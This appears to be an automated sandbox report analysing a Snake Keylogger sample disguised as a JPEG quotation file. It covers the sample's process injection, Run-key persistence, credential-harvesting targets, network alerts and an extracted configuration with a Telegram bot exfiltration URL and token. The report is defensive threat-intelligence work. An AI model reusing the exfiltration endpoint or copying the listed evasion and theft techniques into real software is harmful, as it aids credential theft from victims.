Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RFQ____RM quotation_JPEG IMAGE.img.exe

Overview

General Information

Sample name:RFQ____RM quotation_JPEG IMAGE.img.exe
Analysis ID:1519289
MD5:c3490999b5e36705b9b2abb2a3ed08c1
SHA1:f6af8f800b5e86d12ea5a1a5567da493d0c816b3
SHA256:8f2dd3233b7b97265bcdfc1053875652d9f9012d3716de034f73b5caadd78d7b
Tags:exeuser-threatcat_ch
Infos:

Detection

Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
.NET source code contains potential unpacker
AI detected suspicious sample
Allocates memory in foreign processes
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • RFQ____RM quotation_JPEG IMAGE.img.exe (PID: 3148 cmdline: "C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe" MD5: C3490999B5E36705B9B2ABB2A3ED08C1)
    • InstallUtil.exe (PID: 5500 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • Gydvapkca.exe (PID: 5332 cmdline: "C:\Users\user\AppData\Roaming\Gydvapkca.exe" MD5: C3490999B5E36705B9B2ABB2A3ED08C1)
    • InstallUtil.exe (PID: 3176 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • Gydvapkca.exe (PID: 6716 cmdline: "C:\Users\user\AppData\Roaming\Gydvapkca.exe" MD5: C3490999B5E36705B9B2ABB2A3ED08C1)
    • InstallUtil.exe (PID: 5780 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7898897232:AAH4QekZK0wf1eNHt5yAECTe9huaiVIg5vE/sendMessage?chat_id=5726609491", "Token": "7898897232:AAH4QekZK0wf1eNHt5yAECTe9huaiVIg5vE", "Chat_id": "5726609491", "Version": "5.1"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2089672155.0000000003555000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000000.00000002.2089672155.0000000003555000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      00000000.00000002.2089672155.0000000003555000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_SnakeKeyloggerDetects Snake KeyloggerditekSHen
      • 0x1999c:$x1: $%SMTPDV$
      • 0x19944:$x3: %FTPDV$
      • 0x19968:$m2: Clipboard Logs ID
      • 0x19ba6:$m2: Screenshot Logs ID
      • 0x19cb6:$m2: keystroke Logs ID
      • 0x19f90:$m3: SnakePW
      • 0x19b7e:$m4: \SnakeKeylogger\
      00000006.00000002.2322264218.0000000003762000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000006.00000002.2322264218.0000000003762000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          Click to see the 63 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          6.2.Gydvapkca.exe.3efb240.1.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.431fdb0.7.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.431fdb0.7.unpackJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
                0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.431fdb0.7.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                • 0x12c9d:$a1: get_encryptedPassword
                • 0x12f89:$a2: get_encryptedUsername
                • 0x12aa9:$a3: get_timePasswordChanged
                • 0x12ba4:$a4: get_passwordField
                • 0x12cb3:$a5: set_encryptedPassword
                • 0x14327:$a7: get_logins
                • 0x1428a:$a10: KeyLoggerEventArgs
                • 0x13ef5:$a11: KeyLoggerEventArgsEventHandler
                0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.431fdb0.7.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                • 0x1a622:$a2: \Comodo\Dragon\User Data\Default\Login Data
                • 0x19854:$a3: \Google\Chrome\User Data\Default\Login Data
                • 0x19c87:$a4: \Orbitum\User Data\Default\Login Data
                • 0x1acc6:$a5: \Kometa\User Data\Default\Login Data
                Click to see the 20 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: CurrentVersion Autorun Keys Modification
                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\Gydvapkca.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe, ProcessId: 3148, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Gydvapkca

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-26T09:57:59.328439+020020226401A Network Trojan was detected67.212.175.162443192.168.2.549704TCP
                2024-09-26T09:58:12.351328+020020226401A Network Trojan was detected67.212.175.162443192.168.2.549712TCP
                2024-09-26T09:58:20.390717+020020226401A Network Trojan was detected67.212.175.162443192.168.2.549732TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-26T09:57:59.328439+020020179621A Network Trojan was detected67.212.175.162443192.168.2.549704TCP
                2024-09-26T09:58:12.351328+020020179621A Network Trojan was detected67.212.175.162443192.168.2.549712TCP
                2024-09-26T09:58:20.390717+020020179621A Network Trojan was detected67.212.175.162443192.168.2.549732TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-26T09:58:04.501438+020028033053Unknown Traffic192.168.2.549707188.114.96.3443TCP
                2024-09-26T09:58:07.546643+020028033053Unknown Traffic192.168.2.549709188.114.96.3443TCP
                2024-09-26T09:58:18.647214+020028033053Unknown Traffic192.168.2.549728188.114.96.3443TCP
                2024-09-26T09:58:19.659022+020028033053Unknown Traffic192.168.2.549730188.114.96.3443TCP
                2024-09-26T09:58:26.236139+020028033053Unknown Traffic192.168.2.549744188.114.96.3443TCP
                2024-09-26T09:58:36.205264+020028033053Unknown Traffic192.168.2.549755188.114.96.3443TCP
                2024-09-26T09:58:38.967275+020028033053Unknown Traffic192.168.2.549757188.114.96.3443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-26T09:58:02.914824+020028032742Potentially Bad Traffic192.168.2.549705158.101.44.24280TCP
                2024-09-26T09:58:03.945997+020028032742Potentially Bad Traffic192.168.2.549705158.101.44.24280TCP
                2024-09-26T09:58:06.961661+020028032742Potentially Bad Traffic192.168.2.549708158.101.44.24280TCP
                2024-09-26T09:58:17.258472+020028032742Potentially Bad Traffic192.168.2.549719158.101.44.24280TCP
                2024-09-26T09:58:18.086608+020028032742Potentially Bad Traffic192.168.2.549719158.101.44.24280TCP
                2024-09-26T09:58:19.383486+020028032742Potentially Bad Traffic192.168.2.549729158.101.44.24280TCP
                2024-09-26T09:58:24.789748+020028032742Potentially Bad Traffic192.168.2.549738158.101.44.24280TCP
                2024-09-26T09:58:25.696094+020028032742Potentially Bad Traffic192.168.2.549738158.101.44.24280TCP
                2024-09-26T09:58:27.196006+020028032742Potentially Bad Traffic192.168.2.549746158.101.44.24280TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: RFQ____RM quotation_JPEG IMAGE.img.exeAvira: detected
                Antivirus detection for dropped file
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeAvira: detection malicious, Label: HEUR/AGEN.1323682
                Found malware configuration
                Source: 00000006.00000002.2322264218.0000000003762000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7898897232:AAH4QekZK0wf1eNHt5yAECTe9huaiVIg5vE/sendMessage?chat_id=5726609491", "Token": "7898897232:AAH4QekZK0wf1eNHt5yAECTe9huaiVIg5vE", "Chat_id": "5726609491", "Version": "5.1"}
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeReversingLabs: Detection: 63%
                Multi AV Scanner detection for submitted file
                Source: RFQ____RM quotation_JPEG IMAGE.img.exeReversingLabs: Detection: 63%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for dropped file
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeJoe Sandbox ML: detected
                Machine Learning detection for sample
                Source: RFQ____RM quotation_JPEG IMAGE.img.exeJoe Sandbox ML: detected

                Location Tracking

                barindex
                Tries to detect the country of the analysis system (by using the IP)
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: RFQ____RM quotation_JPEG IMAGE.img.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49706 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49727 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49742 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.5:49704 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.5:49712 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.5:49732 version: TLS 1.2
                Source: RFQ____RM quotation_JPEG IMAGE.img.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2112460663.00000000065D0000.00000004.08000000.00040000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2089672155.00000000034C9000.00000004.00000800.00020000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004259000.00000004.00000800.00020000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.00000000042D1000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000003.00000002.2224812433.0000000002510000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000003.00000002.2248365081.000000000346F000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000006.00000002.2322264218.00000000036DF000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000006.00000002.2301023518.0000000002659000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2112460663.00000000065D0000.00000004.08000000.00040000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2089672155.00000000034C9000.00000004.00000800.00020000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004259000.00000004.00000800.00020000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.00000000042D1000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000003.00000002.2224812433.0000000002510000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000003.00000002.2248365081.000000000346F000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000006.00000002.2322264218.00000000036DF000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000006.00000002.2301023518.0000000002659000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: protobuf-net.pdbSHA256}Lq source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2111673628.00000000064A0000.00000004.08000000.00040000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004C0F000.00000004.00000800.00020000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004439000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: protobuf-net.pdb source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2111673628.00000000064A0000.00000004.08000000.00040000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004C0F000.00000004.00000800.00020000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004439000.00000004.00000800.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 4x nop then jmp 064F56A5h0_2_064F566E
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 4x nop then jmp 064F56A5h0_2_064F5418
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 4x nop then jmp 064F56A5h0_2_064F5428
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h0_2_064F4428
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h0_2_064F4420
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 4x nop then jmp 0650FB60h0_2_0650FAA0
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 4x nop then jmp 0650FB60h0_2_0650FAA8
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 4x nop then jmp 06508A9Ch0_2_06508892
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 4x nop then jmp 06508A9Ch0_2_065088A0
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 4x nop then jmp 065080D2h0_2_06507D78
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 4x nop then jmp 065080D2h0_2_06507D68
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h0_2_065CD918
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 014DF206h2_2_014DF017
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 014DFB90h2_2_014DF017
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h2_2_014DE538
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06858945h2_2_06858608
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06856171h2_2_06855EC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 068558C1h2_2_06855618
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06855D19h2_2_06855A70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]2_2_068533A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]2_2_068533B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06856E79h2_2_06856BD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 068565C9h2_2_06856320
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06856A21h2_2_06856778
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06850741h2_2_06850498
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06857751h2_2_068574A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06850B99h2_2_068508F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 068502E9h2_2_06850040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 068572FAh2_2_06857050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06855441h2_2_06855198
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06858459h2_2_068581B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06857BA9h2_2_06857900
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06850FF1h2_2_06850D48
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06858001h2_2_06857D58
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h3_2_05A94428
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 4x nop then jmp 05A956A5h3_2_05A95428
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h3_2_05A94420
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 4x nop then jmp 05A956A5h3_2_05A95418
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 4x nop then jmp 05A956A5h3_2_05A9566E
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 4x nop then jmp 05AA80D2h3_2_05AA7D68
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 4x nop then jmp 05AA80D2h3_2_05AA7D78
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 4x nop then jmp 05AA8A9Ch3_2_05AA88A0
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 4x nop then jmp 05AA8A9Ch3_2_05AA8893
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 4x nop then jmp 05AAFB60h3_2_05AAFAA8
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 4x nop then jmp 05AAFB60h3_2_05AAFAA0
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h3_2_05B6D918
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 010FF1F6h5_2_010FF007
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 010FFB80h5_2_010FF007
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h5_2_010FE528
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h5_2_010FEB5B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h5_2_010FED3C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06811A38h5_2_06811620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 068102F1h5_2_06810040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06811471h5_2_068111C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0681D1A1h5_2_0681CEF8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0681F8B9h5_2_0681F610
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06811A38h5_2_06811610
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0681C8F1h5_2_0681C648
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0681DA51h5_2_0681D7A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06810751h5_2_068104A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0681E759h5_2_0681E4B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0681B791h5_2_0681B4E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0681DEA9h5_2_0681DC00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0681C041h5_2_0681BD98
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06811011h5_2_06810D60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0681F009h5_2_0681ED60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0681CD49h5_2_0681CAA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0681FD11h5_2_0681FA68
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0681D5F9h5_2_0681D350
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0681E301h5_2_0681E058
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0681F461h5_2_0681F1B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0681C499h5_2_0681C1F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06810BB1h5_2_06810900
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0681EBB1h5_2_0681E908
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0681BBE9h5_2_0681B940
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06811A38h5_2_06811966
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06848945h5_2_06848608
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 068402E9h5_2_06840040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06846171h5_2_06845EC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 068458C1h5_2_06845618
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06845D19h5_2_06845A70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]5_2_068433A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]5_2_068433B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06846E79h5_2_06846BD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 068465C9h5_2_06846320
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06846A21h5_2_06846778
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06840741h5_2_06840498
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06847751h5_2_068474A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06840B99h5_2_068408F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 068472FAh5_2_06847050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06845441h5_2_06845198
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06848459h5_2_068481B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06847BA9h5_2_06847900
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06840FF1h5_2_06840D48
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06848001h5_2_06847D58
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 4x nop then jmp 05C456A5h6_2_05C45418
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h6_2_05C44420
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h6_2_05C44428
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 4x nop then jmp 05C456A5h6_2_05C45428
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 4x nop then jmp 05C456A5h6_2_05C4566E
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 4x nop then jmp 05C580D2h6_2_05C57D68
